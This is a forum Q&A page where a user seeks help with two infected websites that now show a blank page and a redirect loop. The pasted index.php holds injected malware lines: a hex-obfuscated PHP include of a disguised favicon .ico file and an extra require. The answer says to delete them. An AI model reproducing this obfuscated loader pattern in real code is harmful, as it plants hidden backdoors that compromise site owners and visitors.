Answer the question
In order to leave comments, you need to log in
L
L
ligisayan2017-07-14 17:13:31
ligisayan, 2017-07-14 17:13:31
After the virus infected the sites, they stopped working. How to fix?
Hello! There are 2 sites e-montazh.by and chrisal.by located on the same account, which was infected with a virus. Now, when entering 1, it displays an empty page, and on the second, a cyclic redirect is triggered. It seems to have cleared all the evil spirits with the help of aibolit , but the result does not change.
I checked it through various services - it writes cleanly, the only thing according to the rescan.pro report is one redirect to e-montazh.by , but I can’t find anything in the files.
For the site chrisal.by , the
redirectdetective.com service shows a circular redirect . The index.php
file contains:
<?php
/*9b897*/
@include "\x2fho\x6de/\x65mo\x6eta\x7ah/\x70ub\x6cic\x5fht\x6dl/\x63hr\x69sa\x6c.b\x79/c\x61ta\x6cog\x2fmo\x64el\x2fto\x74al\x2ffa\x76ic\x6fn_\x39c1\x624a\x2eic\x6f";
/*9b897*/ @require('wp-admin/68');
// Version
define('VERSION', '1.5.5.1');
// Configuration
if (file_exists('config.php')) {
require_once('config.php');
}
// Install
if (!defined('DIR_APPLICATION')) {
header('Location: install/index.php');
exit;
}Where to dig further to restore access?
1 answer(s)
@Batlab
S
Semyon Beloglazov, 2017-07-14 @Batlab
Well then delete
@include "\x2fho\x6de/\x65mo\x6eta\x7ah/\x70ub\x6cic\x5fht\x6dl/\x63hr\x69sa\x6c.b\x79/c\x61ta\x6cog\x2fmo\x64el\x2fto\x74al\x2ffa\x76ic\x6fn_\x39c1\x624a\x2eic\x6f";
Similar questions
S
D
M
V
A
Didn't find what you were looking for?
Ask your questionAsk a Question
731 491 924 answers to any question